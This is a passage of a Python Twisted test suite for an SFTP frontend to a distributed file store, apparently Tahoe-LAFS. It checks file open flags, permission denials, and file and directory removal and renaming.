self.handler.openFile, "tiny_lit_dir/short",
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
# cannot write to a mutable file via a readonly cap (by path or uri)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile readonly WRITE denied",
self.handler.openFile, "readonly", sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile readonly uri WRITE denied",
self.handler.openFile, "uri/"+self.readonly_uri, sftp.FXF_WRITE, {}))
# cannot create a file with the EXCL flag if it already exists
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile small WRITE|CREAT|EXCL failure",
self.handler.openFile, "small",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile mutable WRITE|CREAT|EXCL failure",
self.handler.openFile, "mutable",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile mutable uri WRITE|CREAT|EXCL failure",
self.handler.openFile, "uri/"+self.mutable_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "openFile tiny_lit_dir/short WRITE|CREAT|EXCL failure",
self.handler.openFile, "tiny_lit_dir/short",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
# cannot write to an immutable file if we don't have its parent (with or without CREAT, TRUNC, or EXCL)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE denied",
self.handler.openFile, "uri/"+self.small_uri, sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT|TRUNC denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile small uri WRITE|CREAT|EXCL denied",
self.handler.openFile, "uri/"+self.small_uri,
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
# test creating a new file with truncation and extension
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
def _write(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
d2.addCallback(lambda ign: wf.writeChunk(8, "0123"))
d2.addCallback(lambda ign: wf.writeChunk(13, "abc"))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 16}))
d2.addCallback(lambda ign: self.handler.getAttrs("newfile", followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 16}))
d2.addCallback(lambda ign: wf.setAttrs({}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "setAttrs with negative size bad",
wf.setAttrs, {'size': -1}))
d2.addCallback(lambda ign: wf.setAttrs({'size': 14}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 14))
d2.addCallback(lambda ign: wf.setAttrs({'size': 14}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 14))
d2.addCallback(lambda ign: wf.setAttrs({'size': 17}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign: self.handler.getAttrs("newfile", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "readChunk on write-only handle denied",
wf.readChunk, 0, 1))
d2.addCallback(lambda ign: wf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "writeChunk on closed file bad",
wf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "setAttrs on closed file bad",
wf.setAttrs, {'size': 0}))
d2.addCallback(lambda ign: wf.close()) # should be no-op
return d2
d.addCallback(_write)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123\x00a\x00\x00\x00"))
# test APPEND flag, and also replacing an existing file ("newfile" created by the previous test)
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_TRUNC | sftp.FXF_APPEND, {}))
def _write_append(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: wf.writeChunk(8, "0123"))
d2.addCallback(lambda ign: wf.setAttrs({'size': 17}))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['size'], 17))
d2.addCallback(lambda ign: wf.writeChunk(0, "z"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_append)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234567890123\x00\x00\x00z"))
# test WRITE | TRUNC without CREAT, when the file already exists
# This is invalid according to section 6.3 of the SFTP spec, but required for interoperability,
# since POSIX does allow O_WRONLY | O_TRUNC.
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {}))
def _write_trunc(wf):
d2 = wf.writeChunk(0, "01234")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_trunc)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234"))
# test WRITE | TRUNC with permissions: 0
d.addCallback(lambda ign:
self.handler.openFile("newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {'permissions': 0}))
d.addCallback(_write_trunc)
d.addCallback(lambda ign: self.root.get(u"newfile"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234"))
d.addCallback(lambda ign: self.root.get_metadata_for(u"newfile"))
d.addCallback(lambda metadata: self.failIf(metadata.get('no-write', False), metadata))
# test EXCL flag
d.addCallback(lambda ign:
self.handler.openFile("excl", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_TRUNC | sftp.FXF_EXCL, {}))
def _write_excl(wf):
d2 = self.root.get(u"excl")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: wf.writeChunk(0, "0123456789"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl)
d.addCallback(lambda ign: self.root.get(u"excl"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
# test that writing a zero-length file with EXCL only updates the directory once
d.addCallback(lambda ign:
self.handler.openFile("zerolength", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_EXCL, {}))
def _write_excl_zerolength(wf):
d2 = self.root.get(u"zerolength")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
# FIXME: no API to get the best version number exists (fix as part of #993)
"""
d2.addCallback(lambda ign: self.root.get_best_version_number())
def _check_version(version):
d3 = wf.close()
d3.addCallback(lambda ign: self.root.get_best_version_number())
d3.addCallback(lambda new_version: self.failUnlessReallyEqual(new_version, version))
return d3
d2.addCallback(_check_version)
"""
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl_zerolength)
d.addCallback(lambda ign: self.root.get(u"zerolength"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
# test WRITE | CREAT | EXCL | APPEND
d.addCallback(lambda ign:
self.handler.openFile("exclappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_EXCL | sftp.FXF_APPEND, {}))
def _write_excl_append(wf):
d2 = self.root.get(u"exclappend")
d2.addCallback(lambda node: download_to_data(node))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: wf.writeChunk(10, "0123456789"))
d2.addCallback(lambda ign: wf.writeChunk(5, "01234"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_excl_append)
d.addCallback(lambda ign: self.root.get(u"exclappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345678901234"))
# test WRITE | CREAT | APPEND when the file does not already exist
d.addCallback(lambda ign:
self.handler.openFile("creatappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_APPEND, {}))
def _write_creat_append_new(wf):
d2 = wf.writeChunk(10, "0123456789")
d2.addCallback(lambda ign: wf.writeChunk(5, "01234"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_append_new)
d.addCallback(lambda ign: self.root.get(u"creatappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345678901234"))
# ... and when it does exist
d.addCallback(lambda ign:
self.handler.openFile("creatappend", sftp.FXF_WRITE | sftp.FXF_CREAT |
sftp.FXF_APPEND, {}))
def _write_creat_append_existing(wf):
d2 = wf.writeChunk(5, "01234")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_append_existing)
d.addCallback(lambda ign: self.root.get(u"creatappend"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "01234567890123401234"))
# test WRITE | CREAT without TRUNC, when the file does not already exist
d.addCallback(lambda ign:
self.handler.openFile("newfile2", sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
def _write_creat_new(wf):
d2 = wf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_new)
d.addCallback(lambda ign: self.root.get(u"newfile2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
# ... and when it does exist
d.addCallback(lambda ign:
self.handler.openFile("newfile2", sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
def _write_creat_existing(wf):
d2 = wf.writeChunk(0, "abcde")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_existing)
d.addCallback(lambda ign: self.root.get(u"newfile2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcde56789"))
d.addCallback(lambda ign: self.root.set_node(u"mutable2", self.mutable))
# test writing to a mutable file
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {}))
def _write_mutable(wf):
d2 = wf.writeChunk(8, "new!")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable)
d.addCallback(lambda ign: self.root.get(u"mutable"))
def _check_same_file(node):
self.failUnless(node.is_mutable())
self.failIf(node.is_readonly())
self.failUnlessReallyEqual(node.get_uri(), self.mutable_uri)
return node.download_best_version()
d.addCallback(_check_same_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable new! contents"))
# ... and with permissions, which should be ignored
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {'permissions': 0}))
d.addCallback(_write_mutable)
d.addCallback(lambda ign: self.root.get(u"mutable"))
d.addCallback(_check_same_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable new! contents"))
# ... and with a setAttrs call that diminishes the parent link to read-only, first by path
d.addCallback(lambda ign:
self.handler.openFile("mutable", sftp.FXF_WRITE, {}))
def _write_mutable_setattr(wf):
d2 = wf.writeChunk(8, "read-only link from parent")
d2.addCallback(lambda ign: self.handler.setAttrs("mutable", {'permissions': 0444}))
d2.addCallback(lambda ign: self.root.get(u"mutable"))
d2.addCallback(lambda node: self.failUnless(node.is_readonly()))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0666))
d2.addCallback(lambda ign: self.handler.getAttrs("mutable", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0444))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable_setattr)
d.addCallback(lambda ign: self.root.get(u"mutable"))
def _check_readonly_file(node):
self.failUnless(node.is_mutable())
self.failUnless(node.is_readonly())
self.failUnlessReallyEqual(node.get_write_uri(), None)
self.failUnlessReallyEqual(node.get_storage_index(), self.mutable.get_storage_index())
return node.download_best_version()
d.addCallback(_check_readonly_file)
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable read-only link from parent"))
# ... and then by handle
d.addCallback(lambda ign:
self.handler.openFile("mutable2", sftp.FXF_WRITE, {}))
def _write_mutable2_setattr(wf):
d2 = wf.writeChunk(7, "2")
d2.addCallback(lambda ign: wf.setAttrs({'permissions': 0444, 'size': 8}))
# The link isn't made read-only until the file is closed.
d2.addCallback(lambda ign: self.root.get(u"mutable2"))
d2.addCallback(lambda node: self.failIf(node.is_readonly()))
d2.addCallback(lambda ign: wf.getAttrs())
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0444))
d2.addCallback(lambda ign: self.handler.getAttrs("mutable2", followLinks=0))
d2.addCallback(lambda attrs: self.failUnlessReallyEqual(attrs['permissions'], S_IFREG | 0666))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_mutable2_setattr)
d.addCallback(lambda ign: self.root.get(u"mutable2"))
d.addCallback(_check_readonly_file) # from above
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable2"))
# test READ | WRITE without CREAT or TRUNC
d.addCallback(lambda ign:
self.handler.openFile("small", sftp.FXF_READ | sftp.FXF_WRITE, {}))
def _read_write(rwf):
d2 = rwf.writeChunk(8, "0123")
# test immediate read starting after the old end-of-file
d2.addCallback(lambda ign: rwf.readChunk(11, 1))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "3"))
d2.addCallback(lambda ign: rwf.readChunk(0, 100))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_read_write)
d.addCallback(lambda ign: self.root.get(u"small"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "012345670123"))
# test WRITE and rename while still open
d.addCallback(lambda ign:
self.handler.openFile("small", sftp.FXF_WRITE, {}))
def _write_rename(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: self.handler.renameFile("small", "renamed"))
d2.addCallback(lambda ign: wf.writeChunk(4, "efgh"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_rename)
d.addCallback(lambda ign: self.root.get(u"renamed"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcdefgh0123"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename small while open", "small",
self.root.get, u"small"))
# test WRITE | CREAT | EXCL and rename while still open
d.addCallback(lambda ign:
self.handler.openFile("newexcl", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_EXCL, {}))
def _write_creat_excl_rename(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: self.handler.renameFile("newexcl", "renamedexcl"))
d2.addCallback(lambda ign: wf.writeChunk(4, "efgh"))
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_creat_excl_rename)
d.addCallback(lambda ign: self.root.get(u"renamedexcl"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcdefgh"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename newexcl while open", "newexcl",
self.root.get, u"newexcl"))
# it should be possible to rename even before the open has completed
def _open_and_rename_race(ign):
slow_open = defer.Deferred()
reactor.callLater(1, slow_open.callback, None)
d2 = self.handler.openFile("new", sftp.FXF_WRITE | sftp.FXF_CREAT, {}, delay=slow_open)
# deliberate race between openFile and renameFile
d3 = self.handler.renameFile("new", "new2")
d3.addErrback(lambda err: self.fail("renameFile failed: %r" % (err,)))
return d2
d.addCallback(_open_and_rename_race)
def _write_rename_race(wf):
d2 = wf.writeChunk(0, "abcd")
d2.addCallback(lambda ign: wf.close())
return d2
d.addCallback(_write_rename_race)
d.addCallback(lambda ign: self.root.get(u"new2"))
d.addCallback(lambda node: download_to_data(node))
d.addCallback(lambda data: self.failUnlessReallyEqual(data, "abcd"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "rename new while open", "new",
self.root.get, u"new"))
# check that failed downloads cause failed reads and failed close,
# when open for writing. Note that this trashes the grid (by deleting
# all shares), so this must be at the end of the test function.
gross = u"gro\u00DF".encode("utf-8")
d.addCallback(lambda ign: self.handler.openFile(gross, sftp.FXF_READ | sftp.FXF_WRITE, {}))
def _read_write_broken(rwf):
d2 = rwf.writeChunk(0, "abcdefghij")
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
# reading should fail (reliably if we read past the written chunk)
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read/write broken",
rwf.readChunk, 0, 100))
# close should fail in this case
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read/write broken close",
rwf.close))
return d2
d.addCallback(_read_write_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_removeFile(self):
d = self._set_up("removeFile")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nofile",
self.handler.removeFile, "nofile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nofile",
self.handler.removeFile, "nofile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeFile nodir/file",
self.handler.removeFile, "nodir/file"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removefile ''",
self.handler.removeFile, ""))
# removing a directory should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "removeFile tiny_lit_dir",
self.handler.removeFile, "tiny_lit_dir"))
# removing a file should succeed
d.addCallback(lambda ign: self.root.get(u"gro\u00DF"))
d.addCallback(lambda ign: self.handler.removeFile(u"gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile gross", "gro\\xdf",
self.root.get, u"gro\u00DF"))
# removing an unknown should succeed
d.addCallback(lambda ign: self.root.get(u"unknown"))
d.addCallback(lambda ign: self.handler.removeFile("unknown"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile unknown", "unknown",
self.root.get, u"unknown"))
# removing a link to an open file should not prevent it from being read
d.addCallback(lambda ign: self.handler.openFile("small", sftp.FXF_READ, {}))
def _remove_and_read_small(rf):
d2 = self.handler.removeFile("small")
d2.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile small", "small",
self.root.get, u"small"))
d2.addCallback(lambda ign: rf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_remove_and_read_small)
# removing a link to a created file should prevent it from being created
d.addCallback(lambda ign: self.handler.openFile("tempfile", sftp.FXF_READ | sftp.FXF_WRITE |
sftp.FXF_CREAT, {}))
def _write_remove(rwf):
d2 = rwf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: self.handler.removeFile("tempfile"))
d2.addCallback(lambda ign: rwf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_write_remove)
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile", "tempfile",
self.root.get, u"tempfile"))
# ... even if the link is renamed while open
d.addCallback(lambda ign: self.handler.openFile("tempfile2", sftp.FXF_READ | sftp.FXF_WRITE |
sftp.FXF_CREAT, {}))
def _write_rename_remove(rwf):
d2 = rwf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: self.handler.renameFile("tempfile2", "tempfile3"))
d2.addCallback(lambda ign: self.handler.removeFile("tempfile3"))
d2.addCallback(lambda ign: rwf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_write_rename_remove)
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile2", "tempfile2",
self.root.get, u"tempfile2"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile3", "tempfile3",
self.root.get, u"tempfile3"))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_removeDirectory(self):
d = self._set_up("removeDirectory")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory nodir",
self.handler.removeDirectory, "nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory nodir/nodir",
self.handler.removeDirectory, "nodir/nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory ''",
self.handler.removeDirectory, ""))
# removing a file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "removeDirectory gross",
self.handler.removeDirectory, u"gro\u00DF".encode('utf-8')))
# removing a directory should succeed
d.addCallback(lambda ign: self.root.get(u"tiny_lit_dir"))
d.addCallback(lambda ign: self.handler.removeDirectory("tiny_lit_dir"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeDirectory tiny_lit_dir", "tiny_lit_dir",
self.root.get, u"tiny_lit_dir"))
# removing an unknown should succeed
d.addCallback(lambda ign: self.root.get(u"unknown"))
d.addCallback(lambda ign: self.handler.removeDirectory("unknown"))
d.addCallback(lambda err:
self.shouldFail(NoSuchChildError, "removeDirectory unknown", "unknown",
self.root.get, u"unknown"))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_renameFile(self):
d = self._set_up("renameFile")
d.addCallback(lambda ign: self._set_up_tree())
# renaming a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile nofile newfile",
self.handler.renameFile, "nofile", "newfile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile '' newfile",
self.handler.renameFile, "", "newfile"))
# renaming a file to a non-existent path should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small nodir/small",
self.handler.renameFile, "small", "nodir/small"))
# renaming a file to an invalid UTF-8 name should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small invalid",
self.handler.renameFile, "small", "\xFF"))
# renaming a file to or from an URI should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small from uri",
self.handler.renameFile, "uri/"+self.small_uri, "new"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small to uri",
self.handler.renameFile, "small", "uri/fake_uri"))
# renaming a file onto an existing file, directory or unknown should fail
# The SFTP spec isn't clear about what error should be returned, but sshfs depends on
# it being FX_PERMISSION_DENIED.
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small small2",
self.handler.renameFile, "small", "small2"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small tiny_lit_dir",
self.handler.renameFile, "small", "tiny_lit_dir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small unknown",
self.handler.renameFile, "small", "unknown"))
# renaming a file onto a heisenfile should fail, even if the open hasn't completed
def _rename_onto_heisenfile_race(wf):
slow_open = defer.Deferred()
reactor.callLater(1, slow_open.callback, None)
d2 = self.handler.openFile("heisenfile", sftp.FXF_WRITE | sftp.FXF_CREAT, {}, delay=slow_open)
# deliberate race between openFile and renameFile
d3 = self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small heisenfile",
self.handler.renameFile, "small", "heisenfile")
d2.addCallback(lambda wf: wf.close())
return deferredutil.gatherResults([d2, d3])
d.addCallback(_rename_onto_heisenfile_race)
# renaming a file to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("small", "new_small"))
d.addCallback(lambda ign: self.root.get(u"new_small"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# renaming a file into a subdirectory should succeed (also tests Unicode names)
d.addCallback(lambda ign: self.handler.renameFile(u"gro\u00DF".encode('utf-8'),
u"loop/neue_gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign: self.root.get(u"neue_gro\u00DF"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.gross_uri))
# renaming a directory to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("tiny_lit_dir", "new_tiny_lit_dir"))
d.addCallback(lambda ign: self.root.get(u"new_tiny_lit_dir"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.tiny_lit_dir_uri))
# renaming an unknown to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("unknown", "new_unknown"))
d.addCallback(lambda ign: self.root.get(u"new_unknown"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.unknown_uri))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_renameFile_posix(self):
def _renameFile(fromPathstring, toPathstring):
extData = (struct.pack('>L', len(fromPathstring)) + fromPathstring +
struct.pack('>L', len(toPathstring)) + toPathstring)
d2 = self.handler.extendedRequest('[email protected]', extData)
def _check(res):
res.trap(sftp.SFTPError)
if res.value.code == sftp.FX_OK:
return None
return res
d2.addCallbacks(lambda res: self.fail("posix-rename request was supposed to "
"raise an SFTPError, not get '%r'" % (res,)),
_check)
return d2
d = self._set_up("renameFile_posix")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign: self.root.set_node(u"loop2", self.root))
d.addCallback(lambda ign: self.root.set_node(u"unknown2", self.unknown))
# POSIX-renaming a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix nofile newfile",
_renameFile, "nofile", "newfile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix '' newfile",
_renameFile, "", "newfile"))
# POSIX-renaming a file to a non-existent path should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small nodir/small",
_renameFile, "small", "nodir/small"))
# POSIX-renaming a file to an invalid UTF-8 name should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small invalid",
_renameFile, "small", "\xFF"))
# POSIX-renaming a file to or from an URI should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small from uri",
_renameFile, "uri/"+self.small_uri, "new"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small to uri",
_renameFile, "small", "uri/fake_uri"))
# POSIX-renaming a file onto an existing file, directory or unknown should succeed
d.addCallback(lambda ign: _renameFile("small", "small2"))
d.addCallback(lambda ign: self.root.get(u"small2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
d.addCallback(lambda ign: _renameFile("small2", "loop2"))
d.addCallback(lambda ign: self.root.get(u"loop2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
